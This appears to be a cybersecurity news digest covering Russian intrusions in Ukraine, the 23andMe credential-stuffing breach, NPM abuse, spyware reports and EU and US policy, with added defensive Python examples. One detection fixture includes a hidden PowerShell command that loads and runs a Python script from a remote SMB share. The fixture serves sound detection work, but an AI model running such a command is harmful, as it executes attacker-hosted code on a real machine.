At a glance.
- Sandworm was in Kyivstar's networks for months.
- GRU cyber campaign incorporates novel malware.
- GXC Team's latest offerings in the C2C underground market.
- Data breach blamed on password reuse.
- UAC-0050 deploys RemcosRAT against Ukrainian targets.
- NPM dependency campaign.
- Cyber-kidnapping in Utah.
- Cameras hacked by Russian intelligence services to provide targeting information.
- NoName057(16) as a model for future hacktivist auxiliaries.
- US Department of Homeland Security assesses cyber threats to the US.
- Zero-click exploit affects iPhones belonging to Kaspersky employees.
- Amnesty International reports Pegasus use in India.
- Cyber Toufan claims attacks against Israeli targets.
- The impact of the European Data Act.
Sandworm was in Kyivstar's networks for months.
Illia Vitiuk, who leads Ukraine's SBU cybersecurity department, has told Reuters that the Sandworm element of Russia's GRU had gained access to telecom provider Kyivstar's networks at least as long ago as May of 2023. Sandworm probably began its attempts against Kyivstar as early as March of that year. Its goal was collection, mostly of data on individual users of Kyivstar's services, followed in the last stages of the operation by destruction of data and disruption of services. A nominally hacktivist group, Solntsepyok, had claimed credit for the attack, but Solntsepyok is almost surely a GRU front.
The effects of the attack on Kyivstar were severe and widespread, but mostly affected civilian users as opposed to military operations--the Ukrainian military doesn't make much tactical use of civilian telecoms. Vitiuk sees the attack as a warning. "This attack is a big message, a big warning," he said, "not only to Ukraine, but for the whole Western world to understand that no one is actually untouchable." Kyivstar is a large, wealthy, private company, a subsidiary of the Netherlands multinational VEON, and it was by no means a soft target. Kyivstar was known for its extensive investment in cybersecurity, but it was successfully attacked nonetheless.
GRU cyber campaign incorporates novel malware.
A phishing campaign run between December 15th and 25th against both Polish and Ukrainian targets has been traced to Russia's GRU, specifically to APT28, Fancy Bear. CERT-UA published details of its investigation into the attack technique: "In the process of investigating the incidents, it was found that the mentioned links redirect the victim to a web resource where, with the help of JavaScript and features of the application protocol 'search' ('ms-search'), a shortcut file is downloaded, the opening of which leads to the launch of a PowerShell command designed to download from a remote (SMB) resource and run (open) a decoy document, as well as the Python programming language interpreter and the Client.py file classified as MASEPIE." The Record notes that the campaign appears intended to propagate across networks, and that it's not confined to compromises of individual devices. GovInfo Security suggests that Russia's record indicates that a wave of attacks like this is likely to precede a major cyber or kinetic operation.
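As an added defender-side example (not CERT-UA's code or data), the following Python scores constructed Sysmon-like process-creation events for the chain CERT-UA describes: a shortcut launching PowerShell that references a remote SMB share and then runs a Python interpreter with a script. The event field names and the sample events are assumptions.

```python
import re

# Constructed process-creation events in a Sysmon-like shape (not real telemetry
# and not CERT-UA's data). pid/ppid link child to parent; "cmd" is the command line.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    # Shortcut opened from Explorer: PowerShell pulls a decoy and a Python script from a remote share.
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -w hidden -c Start-Process \\198.51.100.7\share\decoy.docx; "
            r"\\198.51.100.7\share\python\python.exe \\198.51.100.7\share\Client.py"},
    {"pid": 300, "ppid": 200, "image": r"\\198.51.100.7\share\python\python.exe",
     "cmd": r"python.exe \\198.51.100.7\share\Client.py"},
    # Benign admin PowerShell run from a local path: must not be flagged.
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -File C:\scripts\backup.ps1"},
]

# A UNC path: two backslashes, a host, a backslash, then a share/path with no whitespace, quotes or ';'.
UNC_PATH = re.compile(r"\\\\[\w.\-]+\\[^\s\"';]+")

def basename(image):
    return image.lower().rsplit("\\", 1)[-1]

def flag_chain(events):
    """Return [(pid, [reasons])] for events matching the shortcut -> PowerShell -> SMB -> Python chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        reasons = []
        name, cmd = basename(e["image"]), e["cmd"].lower()
        if name == "powershell.exe":
            unc = UNC_PATH.search(e["cmd"])
            if unc:
                reasons.append("PowerShell references a remote SMB path: " + unc.group(0))
            if "python" in cmd and ".py" in cmd:
                reasons.append("PowerShell launches a Python interpreter with a script")
        if name.startswith("python"):
            parent = by_pid.get(e["ppid"])
            if parent and basename(parent["image"]) == "powershell.exe":
                reasons.append("Python spawned by PowerShell")
            if UNC_PATH.search(e["image"]) or UNC_PATH.search(e["cmd"]):
                reasons.append("Python interpreter or script loaded from a remote share")
        if reasons:
            findings.append((e["pid"], reasons))
    return findings

if __name__ == "__main__":
    for pid, reasons in flag_chain(EVENTS):
        print(pid, "; ".join(reasons))
```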
GXC Team's latest offerings in the C2C underground market.
Resecurity is tracking a cybercriminal gang, “GXC Team,” that develops and sells tools to facilitate online banking theft and social engineering attacks. In November, the gang began selling a tool that uses artificial intelligence to craft fraudulent invoices for use in business email compromise (BEC) attacks. The invoices can hijack business transactions by replacing banking information contained in legitimate invoices. This tool is the latest in a wide variety of social engineering platforms developed by the threat actor.
It's not their first offering in the C2C market. “Previously, the ‘GXC Team’ gained notoriety for creating a wide array of online fraud tools, ranging from compromised payment data checkers to sophisticated phishing and smishing kits,” Resecurity says. “They have been considered the masterminds in this illicit field, supplying fellow cybercriminals with a suite of ready-to-use tools designed to defraud innocent consumers globally. Additionally, they offer ongoing updates and technical support for conducting fraud.”
Data breach blamed on password reuse.
Genetic testing company 23andMe has attracted criticism for its response to a major data breach the company sustained in December, TechCrunch reports. The hackers gained initial access by brute-forcing the accounts of 14,000 customers, then gained access to the data of 6.9 million users who had opted in to the service’s DNA Relatives feature. 23andMe’s response to the breach has been widely perceived as victim-blaming.
23andMe stated in an email to customers who are suing the company that “users negligently recycled and failed to update their passwords following these past security incidents, which are unrelated to 23andMe. Therefore, the incident was not a result of 23andMe’s alleged failure to maintain reasonable security measures.”
Hassan Zavareei, one of the lawyers representing victims of the breach, told TechCrunch, “23andMe knew or should have known that many consumers use recycled passwords and thus that 23andMe should have implemented some of the many safeguards available to protect against credential stuffing — especially considering that 23andMe stores personal identifying information, health information, and genetic information on its platform.”
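One of the safeguards the plaintiffs' lawyer alludes to is spotting credential stuffing in authentication logs. The following Python is an added example, not anything from 23andMe or TechCrunch: it runs a simple rule over constructed log lines, and the log format and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed authentication log lines (not 23andMe data): timestamp, source IP, account, result.
LOG_LINES = """\
2023-12-01T10:00:01Z 203.0.113.5 alice@example.com FAIL
2023-12-01T10:00:02Z 203.0.113.5 bob@example.com FAIL
2023-12-01T10:00:03Z 203.0.113.5 carol@example.com OK
2023-12-01T10:00:04Z 203.0.113.5 dave@example.com FAIL
2023-12-01T10:00:05Z 203.0.113.5 erin@example.com FAIL
2023-12-01T10:00:06Z 203.0.113.5 frank@example.com OK
2023-12-01T10:00:07Z 203.0.113.5 grace@example.com FAIL
2023-12-01T10:00:08Z 203.0.113.5 heidi@example.com FAIL
2023-12-01T10:01:00Z 198.51.100.9 alice@example.com FAIL
2023-12-01T10:01:30Z 198.51.100.9 alice@example.com FAIL
2023-12-01T10:02:00Z 198.51.100.9 alice@example.com OK
2023-12-01T10:05:00Z 192.0.2.44 ivan@example.com OK
"""

def parse_line(line):
    ts, ip, user, result = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, result == "OK"

def detect_stuffing(lines, window=timedelta(minutes=10), min_accounts=5, max_success_rate=0.5):
    """Credential stuffing signature: one source tries many distinct accounts, roughly
    one guess each, and a minority succeed because the password was reused elsewhere.
    A user retrying their own password (198.51.100.9 above) does not match, because
    only one account is involved."""
    per_ip = defaultdict(list)
    for line in lines.strip().splitlines():
        ts, ip, user, ok = parse_line(line)
        per_ip[ip].append((ts, user, ok))
    alerts = {}
    for ip, events in per_ip.items():
        events.sort()
        # One window anchored at the source's first event; a production rule would slide it.
        start = events[0][0]
        in_window = [e for e in events if e[0] - start <= window]
        accounts = {user for _, user, _ in in_window}
        succeeded = sorted(user for _, user, ok in in_window if ok)
        if len(accounts) >= min_accounts and len(succeeded) / len(in_window) <= max_success_rate:
            # Successful logins inside a stuffing burst are the accounts to force-reset first.
            alerts[ip] = {"accounts_tried": len(accounts), "logins_to_review": succeeded}
    return alerts

if __name__ == "__main__":
    for ip, info in detect_stuffing(LOG_LINES).items():
        print(ip, info)
```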
UAC-0050 deploys RemcosRAT against Ukrainian targets.
Uptycs researchers report new developments in the investigation of UAC-0050's cyberespionage operations against Ukraine. "Our Threat Research Team initiated an investigation after the Uptycs platform alerted to a suspicious .lnk file on December 21, 2023. Analysis revealed UAC-0050's deployment of RemcosRAT in a targeted cyber intelligence operation against Ukrainian government agencies."
RemcosRAT is no novelty, and UAC-0050, a group of uncertain control but clearly aligned with Russian intelligence interests, has for the last few years used it as one of its preferred tools. The use of a malicious .lnk file, however, has rendered the attack more effective and more difficult to detect and counter. "In this case," Uptycs writes, "the malicious .lnk file gathers information regarding antivirus products installed on the target computer. It verifies if the display name corresponds to 'Windows Defender'. If so, it proceeds to replace the term with an empty string. As a result, the condition within the ‘if’ statement becomes false, preventing the execution of the ‘exit’ statement. Consequently, the script seamlessly continues with any subsequent code."
The report offers defensive recommendations and a list of indicators of compromise.
NPM dependency campaign.
Checkmarx warns of an apparent troll campaign in the NPM registry that could lead to denial-of-service incidents. A user uploaded a package named “everything” to the registry, which “relies on every other public NPM package, resulting in millions of transitive dependencies.” As a result, users who install the package will experience “issues like storage space exhaustion and disruptions in build pipelines.”
The user is remorseful, and says he didn’t realize he wouldn’t be able to delete the package once it was incorporated into other users’ projects.
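A pre-install gate of the kind that would stop a package like "everything" before it fills a build agent's disk, as an added example that is not Checkmarx's or npm's code: the Python below walks a constructed miniature registry, counts each package's transitive dependencies while breaking cycles, and refuses packages above a configured width or depth. The registry contents and thresholds are constructed assumptions.

```python
from collections import deque

# Constructed miniature registry: package name -> set of direct dependencies.
# Not the real npm graph; "everything-like" stands in for the "everything" package.
REGISTRY = {
    "app": {"left-pad-ish", "tiny-logger"},
    "left-pad-ish": set(),
    "tiny-logger": {"ansi-colorish"},
    "ansi-colorish": {"tiny-logger"},   # a cycle, which npm permits
    "everything-like": {f"pkg{i}" for i in range(50)} | {"app"},
}
for i in range(50):
    REGISTRY[f"pkg{i}"] = set()

def walk(name, registry):
    """Breadth-first walk returning {dependency: depth}; the dict doubles as the visited set, so cycles end."""
    depth = {name: 0}
    queue = deque([name])
    while queue:
        pkg = queue.popleft()
        for dep in registry.get(pkg, ()):
            if dep not in depth:
                depth[dep] = depth[pkg] + 1
                queue.append(dep)
    depth.pop(name)
    return depth

def gate_install(name, registry, max_transitive=25, max_depth=20):
    """Pre-install policy check: refuse packages whose transitive closure is too wide or too deep,
    and name the direct dependencies that contribute the most so the reviewer knows where to look."""
    deps = walk(name, registry)
    deepest = max(deps.values(), default=0)
    heaviest = sorted(registry.get(name, ()), key=lambda d: -len(walk(d, registry)))[:3]
    return {
        "package": name,
        "transitive": len(deps),
        "max_depth": deepest,
        "allowed": len(deps) <= max_transitive and deepest <= max_depth,
        "heaviest_direct_deps": heaviest,
    }

if __name__ == "__main__":
    for pkg in ("app", "everything-like"):
        print(gate_install(pkg, REGISTRY))
```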
Cyber-kidnapping in Utah.
A Chinese exchange student studying in Riverdale City, Utah, and living with a host family has been found after what the authorities are calling a "cyber-kidnapping." It's so called because the victim and his abductors never met physically. Instead, they contacted him online and directed him to quietly leave and stay isolated in a tent in the mountains near Brigham City, some distance away from his hosts. They threatened to harm his family back in China if he didn't comply. As they did this, they also sent his family a ransom demand, likewise online, and the family paid $80,000.
The Deseret News usefully defines "cyber-kidnapping" as "a form of crime in which victims are targeted by online attackers and coerced into isolating themselves in order to demand ransom from their families." It's a form of kidnapping that relies entirely on threatening the victims into compliance, with no direct physical contact required for the crime. The remedy? If you're contacted by cyber-kidnappers, don't follow their instructions, but instead call the police at once.
Cameras hacked by Russian intelligence services to provide targeting information.
Interfax-Ukraine reports that the SBU identified and disabled some Internet-connected security cameras in Kyiv that had been compromised by Russian intelligence services and used to select targets and correct missile targeting during the recent strikes. "According to available information, with the help of these cameras, the aggressor was collecting data for the preparation and correction of strikes on Kyiv," the SBU said. The Record notes that Russian security services are believed to have gained access not only to camera feeds, but to camera controls as well, and with them obtained the ability to direct the cameras toward areas of interest. Reports suggested that the imagery could have been used to correct the fall of shot. That's likelier in the case of cannon fire or free, unguided rockets, but less likely for drones or guided missiles. "Correcting targeting" probably means that the imagery could be valuable pre-strike in target selection, and post-strike in battle damage assessment.
NoName057(16) as a model for future hacktivist auxiliaries.
NoName057(16) selects targets for attack by its supporters, and it offers a distinctive mix of ideological gratification and financial incentives. It's highly disciplined, focused on hitting sites and organizations it brands as "Russophobic," and it's open to volunteers, especially those interested in deploying NoName's DDoSia tool against properly designated targets. The group's approach, CSO writes, in an appreciation that suggests NoName057(16) offers a template for hacktivist auxiliaries, is highly gamified, with ranks and accomplishments structured in ways immediately intelligible to online gamers. The group engages in three main kinds of activity, according to CSO: "disinformation, intimidation, and chaos creation." By "chaos creation" CSO means distributed denial-of-service (DDoS) activity, and that indeed has been the most prominent of NoName's operations. The disinformation and intimidation amount for the most part to trolling.
US Department of Homeland Security assesses cyber threats to the US.
In its annual Homeland Threat Assessment for 2024, the US Department of Homeland Security's Office of Intelligence and Analysis predicts a continuing Russian threat in cyberspace. It draws particular attention to three expected areas of Russian activity against the US to emanate from Russia's war against Ukraine: influence operations, privateering by cyber criminals and disruption by hacktivist auxiliaries, and cyberespionage by intelligence services. Iran and China are also prominently mentioned among the cyber threats expected to be active against the US this year. Much of Iran's activity can be expected to be connected to the war between Hamas and Israel. China represents a major continuing threat. Tensions over Taiwan are expected to continue and probably increase, but most of China's activity in cyberspace will in all likelihood be directed toward long-term political and (especially) economic competition with the US and other rivals. Notably absent from the threat assessment is North Korea.
Zero-click exploit affects iPhones belonging to Kaspersky employees.
Ars Technica reports that iPhones belonging to Kaspersky employees were targeted by an advanced exploit over the course of four years. Ars Technica says “the unknown attackers were able to achieve an unprecedented level of access by exploiting a vulnerability in an undocumented hardware feature that few if anyone outside of Apple and chip suppliers such as ARM Holdings knew of.”
Kaspersky researcher Boris Larin told the publication, “The exploit's sophistication and the feature's obscurity suggest the attackers had advanced technical capabilities. Our analysis hasn't revealed how they became aware of this feature, but we're exploring all possibilities, including accidental disclosure in past firmware or source code releases. They may also have stumbled upon it through hardware reverse engineering.” "Triangulation," as Kaspersky calls both the campaign and the malware it distributed, seems to have been active since 2019 at least.
Russia’s FSB has for some time accused Apple of colluding with the US NSA. In this case, however, Kaspersky explicitly declined to make any attribution, telling Ars Technica, “Currently, we cannot conclusively attribute this cyberattack to any known threat actor. The unique characteristics observed in Operation Triangulation don't align with patterns of known campaigns, making attribution challenging at this stage.”
Amnesty International reports Pegasus use in India.
Amnesty International reported last week that its Security Lab had found evidence of Indian government use of NSO Group's Pegasus intercept tool against journalists working in that country. The cases addressed in the report surfaced between June and October of 2023. Concerns about Pegasus use in India aren't new--the country's Supreme Court ordered an independent investigation into abuse of lawful intercept tools back in October.
Cyber Toufan claims attacks against Israeli targets.
The Record reports that Cyber Toufan, a group claiming adherence to the cause of Hamas, claims to have breached dozens of Israeli organizations, and has promised to dump stolen data online over the coming month. Cyber Toufan has been credibly assessed by Check Point to be an Iranian hacktivist auxiliary, but the group itself dismisses this as Israeli propaganda. They prefer to be seen as grassroots Hamas activists. “The Israeli media and Israel's top cybersecurity firms seem pretty confident in their attribution of us and our work to one foreign state entity or another. We are not surprised,” the Record quotes them as saying. "The lies they tell themselves about the capabilities of the resistance is what allowed us to strike as hard as we did on October the 7th, all under the noses of their very own intelligence and military apparatus.” In addition to Israeli organizations, Cyber Toufan claims to have also breached international firms doing business in Israel.
An assessment of Iranian cyberattacks against control systems.
Recent incursions by Iran's CyberAv3ngers into control systems, most prominently but not exclusively into systems used in US and European municipal water systems, represent a threat to industrial controls, but that may not have been the point of the most recent attacks. The control systems hit were Israeli-made, and Dragos thinks the point being made was political and persuasive, and that the incidents didn't immediately represent a serious attempt at physical disruption. "The #CyberAv3ngers hacktivist group activity targeting critical utilities in the US/Europe is less about making an impact on OT, and more about driving geopolitical agendas," Dragos tweeted late last week.
The impact of the European Data Act.
The European Data Act, which was published in the Official Journal of the European Union just before Christmas, is scheduled to come into effect on January 11. By facilitating data sharing in order to establish a fair and competitive data market, the law stands to protect consumers and their data while also benefiting data collecting businesses and aftermarket services providers alike. cyber/data/privacy insights provides a primer on what the new law means for the EU’s data strategy. In order to make data accessible to users, third parties, and public sector bodies under certain conditions, the European Data Act imposes obligations on manufacturers of connected devices and providers of related services.
The Data Act also addresses unfair contractual terms and dictates new rules making it easier for customers to switch between different data processing providers without undue delay or cost. Additionally, the law expands the obligations for international data transfers under the General Data Protection Regulation (GDPR) and the Schrems II ruling to data processing services providers, requiring them to provide necessary safeguards to protect data from incompatible or unlawful access by third governments.
For instance, third parties receiving data at the request of a user will be allowed to use the data only for the agreed-upon purposes, and will be required to erase the data when it is no longer needed. The Data Act’s third chapter states the conditions and compensation under which data holders can make data available to data recipients and states that the data holder cannot discriminate regarding arrangements for making data available between comparable categories of data recipients. The prediction is that by promoting innovative services and healthier competition for aftermarket services, the Data Act will increase the gross domestic product by 270 billion euros by 2028. Although the law will come into effect later this month, most of its rules will begin to apply in September 2025, with some rules taking effect as late as 2027.
OSS and SBOM guidance from the National Security Agency.
Last month the US National Security Agency (NSA) released guidance on software supply chain security, and it focused on best practices concerning open-source software (OSS) and software bills of materials, or SBOMs. While this publication is not the first to concentrate on securing the software supply chain – which has increasingly become an attractive target for malicious actors – it builds upon guidance previously doled out by the White House and requirements issued by federal agencies like the Office of Management and Budget.
CSO Online provides an overview of the guidelines, which are broken down into four main areas: open-source software management; creating and maintaining a company-internal secure open-source repository; open-source software maintenance, support, and crisis management; and SBOM creation, validation, and artifacts. Highlights include primary considerations for using OSS, which include evaluating OSS components for vulnerabilities and ensuring that vulnerable components aren't included in products, and staying abreast of licensing considerations and export controls, especially given the continued evolution of EU regulations. The publication also notes that SBOMs not only serve as a way of inventorying OSS components, but can also provide increased transparency for downstream consumers. (NSA urges organizations to use the minimum element requirements documented in the National Telecommunications and Information Administration’s "Minimum Elements for a SBOM.”) Regarding SBOM creation, NSA acknowledges that SBOMs can be created at various phases of the software development lifecycle, and as such, the guidance breaks SBOM tools into four categories: source, binary, package, and runtime extractors.
To better maintain and protect these OSS components, NSA recommends adherence to secure code signing requirements, such as performing code signing, using proven cryptography, and securing the code signing infrastructure. Building on previous guidance like NIST's Incident Handling Guide, NSA also calls for organizations to have a crisis management plan at the ready.
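To show what the NTIA "minimum element requirements" mean in practice, here is an added example (not NSA's or NTIA's code) in Python that checks a constructed CycloneDX-style SBOM for the seven NTIA minimum elements. The SBOM content is made up, and the mapping of CycloneDX fields to NTIA elements is this checker's own assumption.

```python
import json

# Constructed CycloneDX-style SBOM for a made-up application (not any real project's SBOM).
# lib-b lacks a supplier and a unique identifier; lib-c is listed but absent from the dependency graph.
SBOM_JSON = """
{
  "bomFormat": "CycloneDX", "specVersion": "1.5",
  "metadata": {
    "timestamp": "2024-01-02T09:00:00Z",
    "authors": [{"name": "Example Corp build pipeline"}],
    "component": {"bom-ref": "app", "name": "example-app", "version": "2.3.1",
                  "supplier": {"name": "Example Corp"}, "purl": "pkg:generic/example-app@2.3.1"}
  },
  "components": [
    {"bom-ref": "lib-a", "name": "lib-a", "version": "1.0.4",
     "supplier": {"name": "Lib A Maintainers"}, "purl": "pkg:npm/lib-a@1.0.4"},
    {"bom-ref": "lib-b", "name": "lib-b", "version": "0.9.0"},
    {"bom-ref": "lib-c", "name": "lib-c", "version": "4.1.0",
     "supplier": {"name": "Lib C Maintainers"}, "purl": "pkg:npm/lib-c@4.1.0"}
  ],
  "dependencies": [
    {"ref": "app", "dependsOn": ["lib-a", "lib-b"]},
    {"ref": "lib-a", "dependsOn": []}
  ]
}
"""

def check_ntia_minimum(sbom):
    """Return (where, element) pairs for each NTIA minimum element that is missing."""
    findings = []
    meta = sbom.get("metadata", {})
    if not meta.get("timestamp"):
        findings.append(("metadata", "Timestamp"))
    # Author of SBOM data: this checker accepts either an explicit author or the generating tool.
    if not (meta.get("authors") or meta.get("tools")):
        findings.append(("metadata", "Author of SBOM Data"))
    # A component's relationship is recorded if it is a "ref" or appears in some "dependsOn".
    related = set()
    for d in sbom.get("dependencies", []):
        related.add(d.get("ref"))
        related.update(d.get("dependsOn", []))
    root = [meta["component"]] if meta.get("component") else []
    for comp in root + sbom.get("components", []):
        ref = comp.get("bom-ref") or comp.get("name") or "<unnamed>"
        if not comp.get("name"):
            findings.append((ref, "Component Name"))
        if not comp.get("version"):
            findings.append((ref, "Version of the Component"))
        if not (comp.get("supplier") or {}).get("name"):
            findings.append((ref, "Supplier Name"))
        if not (comp.get("purl") or comp.get("cpe") or comp.get("swid")):
            findings.append((ref, "Other Unique Identifiers"))
        if ref not in related:
            findings.append((ref, "Dependency Relationship"))
    return findings

def load_and_check(text):
    return check_ntia_minimum(json.loads(text))

if __name__ == "__main__":
    for where, element in load_and_check(SBOM_JSON):
        print(f"{where}: missing {element}")
```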
Mergers and acquisitions.
Cisco will acquire open-source cloud-native networking and security firm Isovalent. The acquisition is expected to close in the third quarter of fiscal year 2024.
SentinelOne has agreed to acquire Bengalaru-based cloud-native application protection platform (CNAPP) provider PingSafe.
SonicWall has acquired security service edge provider Banyan Security.
Palo Alto Networks has completed its acquisition of Israeli secure browser technology provider Talon Cyber Security, SecurityWeek reports.
Investments and exits.
Boston-based cloud-native security company Aqua Security has secured $60 million in a Series E extension led by Evolution Equity Partners, with participation from existing investors Insight Partners, Lightspeed Venture Partners, and StepStone Group. The funding brings the company's valuation to over $1 billion.
New year, new post-quantum cryptography standards.
As we welcome the new year, the digital community also welcomes a new era of data encryption. At the end of 2023, the US National Institute of Standards and Technology (NIST) began the process of finalizing three Post-Quantum Cryptography (PQC) algorithms designed to replace RSA and other long-held protocols used to encrypt digital communications. As quantum computing technology advances, it’s only a matter of time before these old encryption techniques become useless in the face of quantum decryption tactics.
Now, as Breaking Defense explains, it’s up to government agencies and private companies to remove the outdated algorithms and replace them with the NIST-approved PQC protocols. And it’s a race against time, as rivals might already be harvesting data that’s unprotected by PQC and holding onto it until a quantum computer can crack the code. In fact, NIST senior cybersecurity engineer Bill Newhouse says that any data that’s already fallen prey to this “harvest now, decrypt later” strategy could be rendered unusable. At a recent event hosted by the Advanced Technology Academic Research Center, Newhouse stated, “This migration [to PQC] should be the biggest one ever undertaken.”
That said, organizations technically cannot yet implement the new protocols, at least not until they’re officially finalized. They must still undergo a slate of adjudication and validation processes that, according to Newhouse, could take “months or years.” In the meantime, organizations are strongly encouraged to take inventory of their software and create a detailed list of the applications where RSA or other outdated encryption protocols are being used. And that could be a very long list. Wanda Jones-Heath, principal cyber advisor for the Air Force, explains, “It impacts everything we do, from switches to routers to our most prized possessions, our critical weapons systems. If we had not started this two years ago, we would be even further behind.”